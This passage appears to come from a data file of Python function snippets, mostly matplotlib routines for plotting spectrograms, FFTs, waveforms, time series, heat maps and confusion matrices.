cmap==None:\r\n cmap='jet'\r\n else:\r\n cmap=cmap\r\n #aspect ratio\r\n if aspect==None:\r\n aspect='auto'\r\n else:\r\n aspect=aspect\r\n #interpolation\r\n if interpolation==None:\r\n interpolation='gaussian'\r\n else:\r\n interpolation=interpolation\r\n #colorbar orientation\r\n if cbori==None:\r\n cbori='vertical'\r\n else:\r\n cbori=cbori\r\n #colorbar shinkage\r\n if cbshrink==None:\r\n cbshrink=.99\r\n else:\r\n cbshrink=cbshrink\r\n #colorbar aspect\r\n if cbaspect==None:\r\n cbaspect=20\r\n else:\r\n cbaspect=cbaspect\r\n #colorbar pad\r\n if cbpad==None:\r\n cbpad=.1\r\n else:\r\n cbpad=cbpad\r\n \r\n #scale\r\n if scale=='log':\r\n zerofind=np.where(abs(tfarray)==0)\r\n tfarray[zerofind]=1.0\r\n if normalize=='y':\r\n plottfarray=20*np.log10(abs(tfarray/np.max(abs(tfarray))))\r\n else:\r\n plottfarray=20*np.log10(abs(tfarray))\r\n elif scale=='linear':\r\n if normalize=='y':\r\n plottfarray=abs(plottfarray/np.max(abs(plottfarray)))**2\r\n else:\r\n plottfarray=abs(tfarray)**2\r\n \r\n t=np.arange(len(fx))*dt+starttime*dt\r\n FX=np.fft.fft(padzeros(fx))\r\n FXfreq=np.fft.fftfreq(len(FX),dt)\r\n \r\n #set some plot parameters\r\n plt.rcParams['font.size']=10\r\n plt.rcParams['figure.subplot.left']=.13\r\n plt.rcParams['figure.subplot.right']=.98\r\n plt.rcParams['figure.subplot.bottom']=.07\r\n plt.rcParams['figure.subplot.top']=.96\r\n plt.rcParams['figure.subplot.wspace']=.25\r\n plt.rcParams['figure.subplot.hspace']=.20\r\n #plt.rcParams['font.family']='helvetica'\r\n \r\n fig=plt.figure(fignum)\r\n \r\n #plot FFT of fx\r\n fax=fig.add_axes([.05,.25,.1,.7])\r\n plt.plot(abs(FX[0:len(FX)/2]/max(abs(FX)))**2,FXfreq[0:len(FX)/2],'-k')\r\n plt.xlim(0,1)\r\n plt.ylim(0,FXfreq[len(FX)/2-1])\r\n fax.xaxis.set_major_locator(MultipleLocator(.5))\r\n \r\n #plot TFD\r\n pax=fig.add_axes([.25,.25,.75,.7])\r\n if vmm!=None:\r\n vmin=vmm[0]\r\n vmax=vmm[1]\r\n plt.imshow(plottfarray,extent=(tlst[0]/tinc,tlst[-1]/tinc,\r\n flst[0],flst[-1]),aspect=aspect,vmin=vmin,vmax=vmax,cmap=cmap,\r\n interpolation=interpolation)\r\n else:\r\n plt.imshow(plottfarray,extent=(tlst[0]/tinc,tlst[-1]/tinc,\r\n flst[0],flst[-1]),aspect=aspect,cmap=cmap,\r\n interpolation=interpolation)\r\n plt.xlabel('Time('+timeinc+')',fontsize=12,fontweight='bold')\r\n plt.ylabel('Frequency (Hz)',fontsize=12,fontweight='bold')\r\n if title!=None:\r\n plt.title(title,fontsize=14,fontweight='bold')\r\n plt.colorbar(orientation=cbori,shrink=cbshrink,pad=cbpad,aspect=cbaspect)\r\n \r\n #plot timeseries\r\n tax=fig.add_axes([.25,.05,.60,.1])\r\n plt.plot(t,fx,'-k')\r\n plt.axis('tight')\r\n plt.show()", "def _display_tsne(self):\n self._tsne_window.clear()\n self._tsne_window.plot(self._Y_tsne[:,0], self._Y_tsne[:,1], 'b.')", "def plot_time_slices(self):\n U = self.r.u[:, 15:-15, :]\n T = range(U.shape[2])\n kwarglist = [dict(t=t,\n index=self.index,\n U=U,\n levels=self.levels,\n fname=self.time_slice_path(t))\n for t in T]\n util.parallel_process(plot_time_slice, kwarglist=kwarglist)", "def show_waveform(self, peaks=[]):\n if peaks is None:\n peaks = []\n data = self.amplitude\n x_axis = range(0, len(data))\n x_axis = [x / self.fs for x in x_axis]\n plt.plot(x_axis, data)\n plt.axhline(self.height)\n for p in peaks:\n plt.axvline(p / self.fs, color=\"red\", alpha=0.2)\n plt.ylabel(\"Amplitude\")\n plt.xlabel(\"Time (seconds)\")\n plt.title(\"Waveform\")\n plt.show()", "def plot_table(timestamps: dict, threadList: list, mList: list) -> None:\n plt.plot(threadList, timestamps.values(), 'o-')\n plt.legend(mList, title = 'Total valores', loc='best', bbox_to_anchor=(0.5, 0., 0.5, 0.5))\n plt.xlabel('Número de processos')\n plt.ylabel('Tempo de Execução (s)')\n plt.title('Tempo de Execução por Total de Processos e Valores')\n plt.show()", "def fft_viz(image: np.ndarray, shift: bool = True) -> None:\n plt.imshow(img_fft(image, shift=shift), cmap='gray')", "def view(filename):\n n, data, data_dB,sr,ch=inputwav(filename)\n t=np.linspace(0,n/sr,n)\n py.close()\n fig, (ax1) = py.subplots(nrows=1) \n ax1.plot(t[0:n:100],data[0:n:100],'k-',linewidth=1,label=filename)\n ax1.legend(loc=1)\n ax1.set_ylabel('Amplitude (Rel. Bit)')\n ax1.set_xlabel('Time (s)')", "def plot(self):\n\t\tself.plotOfSpect()", "def display_fft(self, N=4096):\n if len(self.series) % N != 0:\n return\n\n h = self.series[-N:]\n H = fft(h)\n\n # the squared magnitude of the fft is an estimate of the\n # power spectral density\n\n # http://documents.wolfram.com/applications/timeseries/\n # UsersGuidetoTimeSeries/1.8.3.html\n # http://en.wikipedia.org/wiki/Power_spectral_density\n freq = range(N / 2 + 1)\n sdf = [Hn * Hn.conjugate() for Hn in H]\n sdf = [sdf[f].real for f in freq]\n loglog(freq, sdf)\n xlabel(\"frequency\")\n ylabel(\"power\")\n show()", "def show(self):\n plt.close() # Remove any existing plot\n plt.imshow(\n self.data,\n extent=[\n self.c - self.radius,\n self.c + self.radius,\n self.r + self.radius,\n self.r - self.radius,\n ],\n )\n plt.colorbar()\n plt.title(self.time.strftime(\"%Y%m%d %H:%M:%S.%f %Z\"))\n plt.show()", "def plot_times(self, train_time, title=None, xmin=None, xmax=None,\n ymin=None, ymax=None, ax=None, show=True, color=None,\n xlabel=True, ylabel=True, legend=True, chance=True,\n label='Classif. score'):\n if not np.array(train_time).dtype is np.dtype('float'):\n raise ValueError('train_time must be float | list or array of '\n 'floats. Got %s.' % type(train_time))\n\n return plot_gat_times(self, train_time=train_time, title=title,\n xmin=xmin, xmax=xmax,\n ymin=ymin, ymax=ymax, ax=ax, show=show,\n color=color, xlabel=xlabel, ylabel=ylabel,\n legend=legend, chance=chance, label=label)", "def PlotTimes(metadata, data):\n\n gp = Gnuplot.Gnuplot(persist=1)\n gp('set data style impulses')\n gp('set xtics 1')\n gp.clear()\n gp.xlabel('seconds')\n gp.ylabel('duration in second')\n gp.title(metadata.AsTitle())\n styles = {}\n line_style = 1\n\n for dataset in data:\n x = numpy.array(dataset.time, dtype='float_')\n if not dataset.name in styles:\n styles[dataset.name] = line_style\n line_style += 1\n d = Gnuplot.Data(x, dataset.data,\n title=dataset.name,\n with_='impulses ls %d' % styles[dataset.name])\n else: # no need to repeat a title that exists already.\n d = Gnuplot.Data(x, dataset.data,\n with_='impulses ls %d' % styles[dataset.name])\n\n gp.replot(d)\n gp.hardcopy('/tmp/%s-%s-%f.png' %\n (metadata.name, metadata.kernel, metadata.duration),\n terminal='png')", "def heat_plot(matrix, filename, xTicks, yTicks, xLabel='X', yLabel='Y'):\n\tfig = plt.figure()\n\tax = fig.add_subplot(111)\n\tcax = ax.matshow(matrix, vmin=0, vmax=1)\n\tfig.colorbar(cax)\n\tticks = np.arange(0, matrix.shape[0], 1)\n\tax.set_xticks(ticks)\n\tax.set_yticks(ticks)\n\tax.set_xticklabels(xTicks)\n\tax.set_yticklabels(yTicks)\n\tax.set_xlabel(xLabel)\n\tax.set_ylabel(yLabel)\n\tplt.savefig(filename)\n\tplt.close()", "def plot1dim(i_dim):\n freq = plt.hist(x=x[:,i_dim], bins=min(100,4*self.grid_shape[i_dim]))[0]\n plt.plot(self.xg[i_dim][:,0],np.zeros(self.grid_shape[i_dim]) + 0.5*np.max(freq),'ko',markersize=3)\n plt.xlabel(r'x_%d'%i_dim)\n plt.ylabel('Frequency')\n plt.title('Dim %d, m = %d' % (i_dim, self.grid_shape[i_dim]))", "def plot_stft(arr, fs, nfft, noverlap):\n\n import matplotlib\n matplotlib.use('agg')\n from matplotlib.mlab import window_hanning, specgram\n\n import matplotlib.pyplot as plt\n\n fig = plt.figure()\n\n arr2D, freqs, bins = specgram(arr, Fs=fs, NFFT=nfft, noverlap=noverlap, window=window_hanning)\n\n # comment this line\n #plt.axis('off')\n axes = plt.gca()\n\n # change this line for y axis control\n axes.set_ylim([1000, 0])\n\n extent = (bins[0],bins[-1]*1024,freqs[-1],freqs[0])\n im = plt.imshow(arr2D,aspect='auto',extent = extent,interpolation=\"none\")\n plt.gca().invert_yaxis()\n\n # comment this line\n #plt.tight_layout(pad=0)\n # comment this line\n plt.colorbar()\n\n # flush draw commands\n fig.canvas.draw()\n\n # Now we can save it to a numpy array.\n data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n plt.close()\n\n # transpose to BGR\n return data[..., ::-1]", "def plot_time(self, X, x0, t):\n\n Pressure = [Solution(self, (x-x0)/t).pressure for x in X]\n Velocity = [Solution(self, (x-x0)/t).velocity for x in X]\n Density = [Solution(self, (x-x0)/t).rho for x in X]\n\n fig, axs = plt.subplots(3, sharex=True)\n fig.suptitle(\"Solution of the Riemann problem\\nat t = {}s\".format(t))\n axs[0].plot(X, Density)\n axs[1].plot(X, Velocity)\n axs[2].plot(X, Pressure)\n\n axs[0].grid()\n axs[0].set(ylabel = \"Density\")\n axs[1].grid()\n axs[1].set(ylabel = \"Velocity\")\n axs[2].grid()\n axs[2].set(ylabel = \"Pressure\")\n\n plt.xlabel(\"Location x\")", "def show_confusion_matrix(matrix: List[List], labels: List[str]):\n fig, ax = plt.subplots()\n fig.set_figheight(15)\n fig.set_figwidth(15)\n\n min_val, max_val = 0, len(labels)\n\n for i in range(max_val):\n for j in range(max_val):\n c = matrix[i][j]\n ax.text(i, j, str(int(c)), va='center', ha='center')\n\n ax.matshow(matrix, cmap=plt.cm.Blues)\n\n # Set number of ticks for x-axis\n ax.set_xticks(np.arange(max_val))\n # Set ticks labels for x-axis\n ax.set_xticklabels(labels, rotation='vertical', fontsize=16)\n\n # Set number of ticks for x-axis\n ax.set_yticks(np.arange(max_val))\n # Set ticks labels for x-axis\n ax.set_yticklabels(labels, rotation='horizontal', fontsize=16)\n \n #ax.set_xlim(min_val, max_val)\n ax.set_ylim(max_val - 0.5, min_val - 0.5)\n plt.show()", "def draw_spectrum(msm):\n # eigenvalues of T sorted by the size\n length = min(len(msm.eigenv), 10) \n a = msm.eigenv[0:length]\n #a = sorted(W, reverse=True, key=lambda x: abs(x))[0:length]\n time = msm.timescales[0:length]\n x = np.arange(1.0,11.0,1.0)[0:length]\n\n # Define limits of the graph\n xmin = 0.7\n xmax = 10.3\n ymin = -0.1\n ymax = 1.1\n\n # Plot the ten biggest eigenvalues:\n ax1 = plt.subplot(111)\n plt.plot(x,a, 'ro', alpha=0.7, ms=8)\n plt.vlines(x,0,a)\n plt.xlabel('Index i', fontsize=12)\n ax1.set_ylabel(r'Eigenvalue $\\lambda_i$', fontsize=12, color='r')\n for tl in ax1.get_yticklabels(): #set tick label color\n tl.set_color('r')\n ax1.xaxis.tick_bottom()\n ax1.yaxis.tick_left()\n plt.axis([xmin, xmax, ymin, ymax])\n\n # add horizontal lines for orientation\n plt.axhline(linewidth=1, color='k')\n plt.axhline(y=1, linewidth=1, color='y')\n\n # plot timescales on the right y-axis:\n ax2 = plt.twinx()\n ax2.plot(x, time, 'bs', alpha=0.6, ms=6)\n #ax2.set_ylim([ymin, ymax])\n #ax2.set_yticks(time)\n #ax2.set_yticklabels([\"{0:0.2}\".format(timescale) for timescale in time])\n ax2.set_ylabel(r'Implied timescale $t_i$', fontsize=12, color='b')\n for tl in ax2.get_yticklabels():\n tl.set_color('b')\n ax2.yaxis.tick_right()\n\n plt.title('Eigenvalues and Implied Timescales', fontsize=16)\n\n plt.axis([xmin, xmax, 0., 1.05*time[1]])\n plt.show()", "def show():\n\tplt.show()", "def plot(self):\n\t\tself.plotOfSpect().plot()", "def show_plot(segment_times, sample_freqs, spec, wave, wav_data, vad_feat):\n plt.subplot(3, 1, 1)\n plt.pcolormesh(segment_times, sample_freqs, 10*np.log10(spec), cmap='jet')\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n\n plt.subplot(3,1,2)\n axes = plt.gca()\n axes.set_xlim([0, wave.duration])\n tmp_axis = np.linspace(0, wave.duration, wav_data.shape[0])\n plt.plot(tmp_axis, wav_data/np.abs(np.max(wav_data)))\n plt.xlabel('Time [sec]')\n\n plt.subplot(3,1,3)\n axes = plt.gca()\n axes.set_xlim([0, wave.duration])\n tmp_axis = np.linspace(0, wave.duration, vad_feat.shape[0])\n plt.plot(tmp_axis, vad_feat)\n plt.xlabel('Time [sec]')\n\n plt.savefig('test', bbox_inches='tight')", "def show_spectrum(h, title=\"\"):\n H = fft2(h)\n\n # Remember to plot the abs of the fft2(h)\n plt.imshow(np.abs(H))\n plt.gray()\n plt.title(title)\n plt.show()", "def plotting(self, figsize=(12, 12), types=['freqs']):\n ax = plt.figure(figsize=figsize)\n if 'freqs' in types:\n count_dict = self.count_freq(types=1)\n plt.title(\n f'Total keys in count_dict: {sum(list(count_dict.values()))}')\n barh = plt.barh(list(count_dict.keys()), list(count_dict.values()), color=[\n np.random.rand(3,) for _ in range(self.categories)])\n for rect in barh:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_height()/2.0, height,\n '%d' % int(height), ha='center', va='bottom')\n\n plt.legend()\n plt.show()", "def generateFreqGraph( invertedIndex ):\n print('Printing plot for Step 3 frequencies')\n print('----------------------------------------------------------------')\n tempList = sorted( invertedIndex, key=lambda element: element[1], reverse = True )\n freqDict = {}\n count = 1\n for term, freq in tempList:\n freqDict[count] = freq\n count+=1\n \n #Plot the frequency based graph\n plt.figure()\n plt.xlabel('$\\log_{10}(i)$ for $i^{th}$ most frequent term')\n plt.ylabel('$\\log_{10}(y_i)$ for freq of $i^{th}$ term')\n plt.title('$\\log_{10} y_i$ vs $\\log_{10}i$')\n plt.plot(np.log10(list(freqDict.keys())), np.log10(list(freqDict.values())), '-o')", "def plot2dTimeSeries(values, title='series', xLabel='time', yLabel='values', savePath='.'):\n plt.plot(values)\n plt.ylabel(yLabel)\n plt.xlabel(xLabel)\n plt.xticks(np.linspace(0, len(values), 11))\n plt.title(title)\n plt.savefig(f'{savePath}/{title}.png')\n plt.show(block=False)\n plt.pause(2)\n plt.close()", "def plot_fitter(self):\n\n total_time=self.interval*self.maxspectra\n times = np.linspace(self.interval,total_time + 1,self.interval)\n spectra_fitter.main(self.rt_plot.sum_data, times)", "def temporal_browser(Database, subjects=None, timescale = 'year'):\n QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling)\n if hasattr(QtWidgets.QStyleFactory, \"AA_UseHighDpiPixmaps\"):\n QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps)\n app = QtWidgets.QApplication(sys.argv)\n ui3 = temporal_ui(Database, subjects, timescale)\n app.exec_()", "def plot_time_series(self, *args, **kwargs):\n return SimulationStaticVisualizer(self, *args, **kwargs)", "def matrix_callback(value):\n self.hitlet_points = self.hitlets_to_hv_points(self.hitlets_per_event[value],\n t_ref=self.event_df.loc[value, 'time']\n )\n\n # Create the hitlet matrix and time stream:\n self.hitlet_matrix = self.plot_hitlet_matrix(hitlets=None,\n _hitlet_points=self.hitlet_points)\n return self.hitlet_matrix", "def plot_matrix_method(pulse, trap, ToP):\n n0, d = trap.matrix_method(pulse)\n for k in range(len(d)):\n ave_list = []\n timestep = np.arange(0, trap.N+1, 1)\n for i in range(len(d[k])):\n sum2 = 0\n for j in range(len(d[k][i])):\n sum2 += (j) * d[k][i][j]\n ave_list.append(sum2)\n if ToP == 'a':\n plt.plot(timestep * pulse.t * 1e3, ave_list, label = pulse.t)\n if ToP == 'b':\n plt.plot(timestep * pulse.t * 1e3, ave_list, color = 'black', label = 'Matrix')\n if ToP == 'c':\n plt.plot(timestep * pulse.t * 1e3, ave_list, color = 'b')\n # plt.legend()\n # plt.xlabel('time (ms)')\n # plt.ylabel('n')\n #plt.xlim(0, 10) ", "def plot_message_counts(df, size=(20, 4), freq='d'):\n df_resampled = df.resample(freq)\n sns.set(rc={'figure.figsize': size})\n df_resampled.count().plot(linewidth=0.5)", "def plot_frequency(word_frequency, n, output_name=\"output.png\"):\r\n # partially completed for you, complete the rest according to the instructions.\r\n # setting up plot variables\r\n words = tuple(zip(*word_frequency))[0]\r\n frequencies = tuple(zip(*word_frequency))[1]\r\n y_pos = np.arange(len(words))\r\n fig, ax = plt.subplots(figsize=(15, 10))\r\n # set up color spectrum\r\n colors = [\r\n \"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"indigo\",\r\n \"violet\"\r\n ]\r\n rvb = mcolors.LinearSegmentedColormap.from_list(\"\", colors)\r\n nlist = np.arange(n).astype(float)\r\n ax.barh(y_pos, frequencies, align='center', color=rvb(nlist/n))\r\n ax.set_yticks(y_pos)\r\n ax.set_yticklabels(words)\r\n ax.invert_yaxis()\r\n ax.set_xlabel('Frequency')\r\n ax.set_title(\"Word Frequency: Top {}\".format(n))\r\n # Only comment below line when debugging. Uncomment when submitting\r\n plt.savefig(output_name)", "def plotFFT(filename):\n fs_rate, signal = wavfile.read(filename)\n len_audio = len(signal.shape)\n print(signal.shape)\n print(signal[:][0])\n if len_audio == 2:\n signal = signal.sum(axis=1) / 2\n N = signal.shape[0]\n FFT = abs(scipy.fft(signal))\n FFT_side = FFT[range(N//2)]\n freqs = scipy.fftpack.fftfreq(signal.size, 1.0/fs_rate)\n fft_freqs = np.array(freqs)\n freqs_side = freqs[range(N//2)] # one side frequency range\n plt.plot(freqs_side, abs(FFT_side), \"b\") # plotting the complete fft spectrum\n plt.xlabel('Frequency (Hz)')\n plt.ylabel('Single-sided Amplitude')\n plt.show()", "def plot_dataset(self):\n plt.plot(self.ground_truth, marker='o')\n plt.ylabel('Number of Topics')\n plt.xlabel('Window Number')\n plt.yticks(list(set(self.ground_truth)))\n plt.savefig(os.path.join(self.output_path, 'shift-plot.pdf'))", "def draw_spike_times(spike_times):\n for line in spike_times:\n plt.axvline(x=line, color='y')", "def plot_periodogram(trj, coord: str = \"y\", fs: int = 1, interactive: bool = True):\n from scipy import signal\n\n vals = trj[coord].values\n f, Pxx = signal.periodogram(vals, fs=fs, window=\"hanning\", scaling=\"spectrum\")\n plt.title(\"Power Spectrum\")\n plt.plot(f, Pxx)\n if interactive:\n plt.show()\n\n return plt.gcf()", "def show(self, fig=None):\n i = 0\n # for t = 0:obj.step_size:obj.duration\n # TODO: make a generator?\n iterator = np.linspace(0, self.duration(), num=math.ceil(self.duration() / self.step_precision) + 1)\n tfInterp_l = np.zeros((4, 4, len(iterator)))\n tfInterp_r = np.zeros((4, 4, len(iterator)))\n for t in iterator:\n [lfp, rfp] = self.footPosition(t)\n tfInterp_l[:, :, i] = lfp\n tfInterp_r[:, :, i] = rfp\n i = i + 1\n\n self.show_tf(fig, tfInterp_l, len(iterator))\n self.show_tf(fig, tfInterp_r, len(iterator))", "def plot_spectrum(data_path, save_path,\n title='k'):\n\n data = np.loadtxt(data_path,\n delimiter=TAB_DELIMITER,\n dtype=COUNT_DTYPE,\n skiprows=SKIPROW, usecols=COLS,)\n channels = data[:, 0]\n counts = data[:, 1]\n \n plt.figure()\n plt.plot(channels, counts,\"r.\")\n if title is not None:\n plt.title(data_path)\n plt.ylabel(\"Counts\")\n plt.xlabel(\"Channel\")\n plt.savefig(save_path, dpi=DPI)\n \n return", "def time_stats(df):\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n \n #adding histogram of times\n plt.hist(df['Start Time'].dt.hour, bins='auto', edgecolor='black')\n plt.title('Histogram of Travel Frequency by Hour')\n plt.xlabel('Hour of the Day')\n plt.ylabel('Count of Trips')\n plt.axis('tight')\n plt.grid()\n plt.show()\n \n # display the most common month\n popular_month = df['month'].mode()[0]\n print('Most Popular Month: \\n',cal.month_name[popular_month])\n\n # display the most common day of week\n popular_day = df['day'].mode()[0]\n print('Most Popular Day: \\n',popular_day )\n \n # display the most common start hour\n popular_hour = df['hour'].mode()[0]\n print('Most Popular Hour: \\n',popular_hour )\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)", "def plt_spectrogram(X,win_length, hop_size, sample_rate, zoom_x=None, zoom_y=None,tick_labels='time-freq'):\n\n # Find the size of stft\n Nf,Nt=np.shape(X)\n\n # Compute the log magnitude spectrogram\n X=20*np.log10(np.abs(X))\n\n # Extract the first half of the spectrum for each time frame\n X=X[0:Nf/2]\n # Nf=np.shape(X)[0]\n #\n # # Generate time vector for plotting\n # times=(hop_size/float(sample_rate))*np.arange(Nt)\n #\n # # Generate frequency vector for plotting\n # freqs=(float(sample_rate)/win_length)*np.arange(Nf)\n #\n # # Generate time and frequency matrices for pcolormesh\n # times_matrix,freqs_matrix=np.meshgrid(times,freqs)\n # #\n # # Plot the log magnitude spectrogram\n # plt.title('Log magnitude spectrogram')\n # if tick_labels == 'bin-frame':\n # plt.pcolormesh(X)\n # plt.xlabel('Time-frame Number')\n # plt.ylabel('Frequency-bin Number')\n # else:\n # plt.pcolormesh(times_matrix,freqs_matrix,X)\n # plt.xlabel('Time (sec)')\n # plt.ylabel('Frequency (Hz)')\n #\n # # Zoom in on the plot if specified\n # if zoom_x is None and zoom_y is None:\n # plt.axis('tight')\n #\n # if zoom_x is not None:\n # plt.xlim(zoom_x)\n #\n # if zoom_y is not None:\n # plt.ylim(zoom_y)\n #\n return X", "def plotfreqs(file, type):\n \n ftitle = 'Frequencies ({0})'.format(type)\n \n d = genplotlib.gendict_freq(file)\n md = genplotlib.genlist(d)\n keylist = genplotlib.genkeylist(d)\n genplotlib.plotdata(d, md, keylist, 's', ftitle=ftitle, err='stdev', ylim=8, ylabel='Hz')\n name = 'pooled_freqs_{0}'.format(type)\n plt.savefig(name)", "def conf_matrix_plotter(model, X_t_vec, y_t):\n fig, ax = plt.subplots()\n\n fig.suptitle(str(model))\n\n plot_confusion_matrix(model, X_t_vec, y_t, ax=ax, cmap=\"plasma\");", "def visualize_signal(self):\n plt.figure()\n plt.title('Accelerometer Signal')\n plt.plot(range(len(self.data)), self.data[1])", "def plot(self, show=True):\n xs, ys = zip(*[(float(ix)/self.sample_rate, val)\n for ix, val in enumerate(self.samples)])\n plt.plot(xs, ys)\n if show:\n plt.show()", "def plot(self):\n\n import matplotlib.pyplot as plt\n plt.matshow(self.event_roll.T, cmap=plt.cm.gray, interpolation='nearest', aspect='auto')\n plt.show()", "def FourierRect(N):\n x = np.zeros((1,N))\n x[:,0:30]=1;\n x=x.flatten();\n \n \n #compute the DFT coefficients\n r1=FourierSeries(x)\n #magnitude of DFT coefficients\n a1=cabs(r1)\n\n #plot the time domain signal\n subplot(2,1,1)\n plt.plot(range(0,len(x)),x)\n xlabel('Time')\n ylabel('Amplitude')\n title('time doman')\n plt.ylim(-2,2);\n \n #plot the DFT coefficients\n L=len(a1);\n fr=np.arange(0,L);\n subplot(2,1,2)\n plt.stem(fr,a1,'r') # plotting the spectrum\n xlabel('Freq (Hz)')\n ylabel('|Y(freq)|')\n title('complete signal')\n ticks=np.arange(0,L+1,25);\n plt.xticks(ticks,ticks); \n show()", "def visualize(self, time, pred, true):\n plt.plot(time, true, label='Actual')\n plt.plot(time, pred, label='Predicted')\n plt.xlabel('Time')\n plt.ylabel('Price ($)')\n plt.legend(bbox_to_anchor=(0.1, 1), loc=2, borderaxespad=0.,\n prop={'size': 14})\n plt.show()", "def example3():\n arrive_time=example2() # Get packets arrive time using example1\n time_series.plot_time_series(arrive_time) # Plot time series using packets arrive time", "def plot_spectrum(sims, noise=False, maxtime=240):\n logging.log(15, \"starte plotting\")\n #ein Spektrum mit max 30 Chroms, gemeinsame Zeitenliste erstellen\n if len(sims) < 30:\n spectrum = [0,maxtime]\n #evtl Rauschen hinzufuegen\n if noise:\n for i in range(int(sims[0].number*len(sims)/10)):\n spectrum.append(random.uniform(0, maxtime))\n for sim in sims:\n for t in sim.times:\n if sim.pd[0] < 250:\n spectrum.append(t)\n hist, bins = np.histogram(spectrum, bins= maxtime, normed = True)\n offset = bins[1:]-bins[:-1]\n plt.plot(bins[:-1]+offset, hist, \"k\")\n #plt.ylim((0, 0.3))\n plt.xlim((0, maxtime))\n plt.xlabel(\"Retentionszeit/s\")\n plt.ylabel(\"Intensität\")\n title = \"Spektrum\"\n if noise:\n title += \" mit Rauschen\"\n plt.suptitle(title)\n plt.show()", "def plot_spectra(path):\r\n plt.figure(figsize=(20, 10))\r\n x, y= np.loadtxt(fname=path, delimiter='\\t',dtype=int,\r\n usecols = (1,2), skiprows=100, unpack = True)\r\n plt.plot(x, y)\r\n return plt.show()", "def plot_waveforms(cutouts, fs, pre, post, n=100, color='k', show=True):\n if n is None:\n n = cutouts.shape[0]\n n = min(n, cutouts.shape[0])\n time_in_us = np.arange(-pre*1000, post*1000, 1e3/fs)\n if show:\n _ = plt.figure(figsize=(10,6))\n\n for i in range(n):\n _ = plt.plot(time_in_us, cutouts[i,]*1e6, color, linewidth=1, alpha=0.3)\n _ = plt.xlabel('Time (ms)')\n _ = plt.ylabel('Voltage (mV)')\n _ = plt.title('Spike Waveforms')\n\n if show:\n plt.show()", "def data_vis():\n dataroot = 'solar_data.txt'\n debug = False \n diff = False\n X, y = read_data(dataroot, debug, diff)\n\n # First plot the original timeseries\n fig = plt.figure(figsize=(40,40))\n\n fig.add_subplot(3,3,1)\n plt.plot(y)\n plt.title('Avg Global PSP (vent/cor) [W/m^2]')\n # plt.show()\n\n fig.add_subplot(3,3,2)\n plt.plot(X[:,0])\n plt.title('Avg Zenith Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,3)\n plt.plot(X[:,1])\n plt.title('Avg Azimuth Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,4)\n plt.plot(X[:,2])\n plt.title('Avg Tower Dry Bulb Temp [deg C]')\n # plt.show()\n\n fig.add_subplot(3,3,5)\n plt.plot(X[:,3])\n plt.title('Avg Tower RH [%]')\n # plt.show()\n\n fig.add_subplot(3,3,6)\n plt.plot(X[:,4])\n plt.title('Avg Total Cloud Cover [%]')\n # plt.show()\n\n fig.add_subplot(3,3,7)\n plt.plot(X[:,5])\n plt.title('Avg Avg Wind Speed @ 6ft [m/s]')\n # plt.show()\n\n ##########################################################################################\n # Plotting the Fourier Transform of the signals\n\n freq = np.fft.fftfreq(len(y), 1*60*60)\n\n fig = plt.figure(figsize=(40,40))\n\n fig.add_subplot(3,3,1)\n plt.plot(freq, np.abs(np.fft.fft(y)))\n plt.title('Avg Global PSP (vent/cor) [W/m^2]')\n # plt.show()\n\n fig.add_subplot(3,3,2)\n plt.plot(freq, np.abs(np.fft.fft(X[:,0])))\n plt.title('Avg Zenith Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,3)\n plt.plot(freq, np.abs(np.fft.fft(X[:,1])))\n plt.title('Avg Azimuth Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,4)\n plt.plot(freq, np.abs(np.fft.fft(X[:,2])))\n plt.title('Avg Tower Dry Bulb Temp [deg C]')\n # plt.show()\n\n fig.add_subplot(3,3,5)\n plt.plot(freq, np.abs(np.fft.fft(X[:,3])))\n plt.title('Avg Tower RH [%]')\n # plt.show()\n\n fig.add_subplot(3,3,6)\n plt.plot(freq, np.abs(np.fft.fft(X[:,4])))\n plt.title('Avg Total Cloud Cover [%]')\n # plt.show()\n\n fig.add_subplot(3,3,7)\n plt.plot(freq, np.abs(np.fft.fft(X[:,5])))\n plt.title('Avg Avg Wind Speed @ 6ft [m/s]')\n # plt.show()\n\n ##################################################################################################\n # Print correlation matrix\n\n df = pd.DataFrame(np.c_[y, X])\n df.columns = ['Avg Global PSP (vent/cor) [W/m^2]','Avg Zenith Angle [degrees]','Avg Azimuth Angle [degrees]','Avg Tower Dry Bulb Temp [deg C]','Avg Tower RH [%]','Avg Total Cloud Cover [%]','Avg Avg Wind Speed @ 6ft [m/s]']\n f = plt.figure(figsize=(19, 15))\n plt.matshow(df.corr(), fignum=f.number)\n plt.xticks(range(df.shape[1]), df.columns, fontsize=14, rotation=20)\n plt.yticks(range(df.shape[1]), df.columns, fontsize=14)\n cb = plt.colorbar()\n cb.ax.tick_params(labelsize=14)\n plt.title('Correlation Matrix', fontsize=16);\n plt.show()", "def plot_firing_rates(self, t, mode='ON'):\n frs = self.data['FP'][0] / self.DT\n nn = self.L_N ** 2 * 2\n if mode == 'OFF':\n fr = frs[0: nn / 2, t]\n elif mode == 'ON':\n fr = frs[nn / 2: nn, t]\n else:\n raise ValueError('mode must be ON or OFF')\n\n plt.imshow(fr.reshape(self.L_N, self.L_N),\n interpolation='nearest',\n cmap=plt.cm.gray,\n vmin=0, vmax=100.)\n # t_str = ('lambda(t) (Hz) for {} Cells'.format(mode))\n # plt.title(t_str)", "def visualization(tv_summary, speech_summary, start, stop, mode='interactive'):\n\n # There was a problem with unicode to ascii errors cropping up again in matplotlib\n # TODO fix encoding errors for the following years\n skip_years = [1941, 1942, 1945, 1995, 2005, 2006, 2010, 2011]\n for start_year in [year for year in range(start, stop) if year not in skip_years]:\n print \"Creating figure for \" + str(start_year)\n heat_map, keywords = create_heat_map(source=tv_summary,\n response=speech_summary,\n max_keywords=45,\n start_year=start_year,\n interval=50)\n\n fig = plot_heat_map(heat_map, keywords, start_year)\n\n if mode == 'save':\n # Save fig to file\n fig.set_size_inches(11, 7.5)\n fig.savefig('output/output' + 